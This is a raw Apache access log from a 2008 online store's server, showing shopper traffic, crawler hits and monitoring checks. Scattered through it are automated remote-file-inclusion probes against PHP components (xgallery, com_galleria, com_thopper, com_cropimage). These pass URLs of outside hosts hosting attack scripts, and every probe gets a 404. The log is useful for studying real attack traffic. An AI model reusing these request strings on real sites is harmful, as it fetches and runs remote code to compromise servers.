213.96.207.210 - - [20/May/2008:01:40:49 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:50 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:50 -0400] "GET /images/nav04_about_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:50 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.0" 200 1390 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:50 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:51 -0400] "GET /images/nav04_download_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:51 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:51 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:51 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:52 -0400] "GET /images/nav_store_head.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:52 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:52 -0400] "GET /images/spacer.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:52 -0400] "GET /images/login.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:52 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:53 -0400] "GET /images/search.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:53 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:53 -0400] "GET /images/sale_promo-icon.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:53 -0400] "GET /images/index12_drills.jpg HTTP/1.0" 200 3214 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:54 -0400] "GET /images/index12_exhex.jpg HTTP/1.0" 200 2849 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:54 -0400] "GET /images/index12_intconnct.jpg HTTP/1.0" 200 2999 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:55 -0400] "GET /images/nav04_download_over.jpg HTTP/1.0" 200 1460 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:55 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:40:56 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "-"
213.96.207.210 - - [20/May/2008:01:41:00 -0400] "GET /images/nav04_download_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
66.249.73.121 - - [20/May/2008:01:41:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B35D84600799009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.96.207.210 - - [20/May/2008:01:41:54 -0400] "GET /images/index12_drills.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:50 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:50 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.0" 200 2616 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:50 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:53 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:55 -0400] "GET /images/ace_logo_top_over.jpg HTTP/1.0" 200 2616 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:55 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:56 -0400] "GET /images/ace_logo_top.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:56 -0400] "GET /images/nav04_about_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:56 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:56 -0400] "GET /images/nav04_download_over.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
213.96.207.210 - - [20/May/2008:01:42:58 -0400] "GET /images/nav04_download_off.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0F29E51C6ED8520055C0071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {EB37764F-F4A1-4A4F-AEBE-00FDAC336E58})"
66.249.73.121 - - [20/May/2008:01:44:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B3628F600759009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:46:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58601037782600D440096+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:49:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B3568F600749009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:51:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B35888600759009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.105.239 - - [20/May/2008:01:52:06 -0400] "GET /logs/error_log.Q107071800 HTTP/1.1" 200 121795 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.73.121 - - [20/May/2008:01:54:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF59731832F8D6004D90095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [20/May/2008:01:54:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.121 - - [20/May/2008:01:56:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF59731832D826004D90095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.121 - - [20/May/2008:01:59:16 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LAF59731832B8C6004090095+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [20/May/2008:02:00:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.12.23 - - [20/May/2008:02:01:37 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
88.191.12.23 - - [20/May/2008:02:01:37 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.249.73.121 - - [20/May/2008:02:01:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B36088600759009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.74.192.227 - - [20/May/2008:02:03:10 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.810"
77.74.192.227 - - [20/May/2008:02:03:10 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
66.249.73.121 - - [20/May/2008:02:04:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L8F58BA1B35B86600739009N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.6.122.93 - - [20/May/2008:02:05:22 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
66.6.122.93 - - [20/May/2008:02:05:22 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
209.59.12.99 - - [20/May/2008:02:05:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.241.197.120 - - [20/May/2008:02:05:59 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
212.241.197.120 - - [20/May/2008:02:05:59 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
209.216.213.115 - - [20/May/2008:02:08:16 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
209.216.213.115 - - [20/May/2008:02:08:16 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
66.6.122.93 - - [20/May/2008:02:08:43 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
66.6.122.93 - - [20/May/2008:02:08:43 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
209.59.12.99 - - [20/May/2008:02:10:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.30.169.10 - - [20/May/2008:02:11:03 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
194.30.169.10 - - [20/May/2008:02:11:03 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
80.93.62.114 - - [20/May/2008:02:12:44 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
80.93.62.114 - - [20/May/2008:02:12:44 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2008:02:15:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.33.2.131 - - [20/May/2008:02:19:31 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
206.33.2.131 - - [20/May/2008:02:19:32 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/May/2008:02:21:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.58.138.166 - - [20/May/2008:02:22:11 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
207.58.138.166 - - [20/May/2008:02:22:11 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
193.109.140.37 - - [20/May/2008:02:25:10 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.109.140.37 - - [20/May/2008:02:25:11 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/May/2008:02:27:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.65.52.148 - - [20/May/2008:02:29:13 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.69"
83.65.52.148 - - [20/May/2008:02:29:14 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.69"
209.59.12.99 - - [20/May/2008:02:32:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.121 - - [20/May/2008:02:34:19 -0400] "GET /logs/error_log.Q107062600 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.191.12.23 - - [20/May/2008:02:36:00 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
88.191.12.23 - - [20/May/2008:02:36:00 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.191.12.23 - - [20/May/2008:02:37:17 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
88.191.12.23 - - [20/May/2008:02:37:18 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://dirtydaughter.com/browniethumbnails/safeon.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/May/2008:02:37:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:02:42:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.110 - - [20/May/2008:02:46:10 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.188 - - [20/May/2008:02:46:10 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/May/2008:02:47:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.105.230 - - [20/May/2008:02:51:57 -0400] "GET /logs/error_log.Q107100600 HTTP/1.1" 200 22844 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.59.12.99 - - [20/May/2008:02:52:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.104 - - [20/May/2008:02:56:22 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.104 - - [20/May/2008:02:56:23 -0400] "GET /ACE.html HTTP/1.0" 200 5877 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/May/2008:02:57:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/May/2008:03:02:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.228.67.155 - - [20/May/2008:03:03:15 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 39776 "http://www.acesurgical.com/home_May08.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/ace_logo_top.jpg HTTP/1.1" 200 2702 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/nav04_about_off.jpg HTTP/1.1" 200 1255 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/nav04_shop_off.jpg HTTP/1.1" 200 1390 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/nav04_conven_off.jpg HTTP/1.1" 200 1341 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/nav04_download_off.jpg HTTP/1.1" 200 1206 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/nav04_contact_off.jpg HTTP/1.1" 200 965 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:18 -0400] "GET /images/ace_logo_bottom.jpg HTTP/1.1" 200 2447 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/nav_store_head.jpg HTTP/1.1" 200 1953 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/nav_store_index_off.jpg HTTP/1.1" 200 922 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
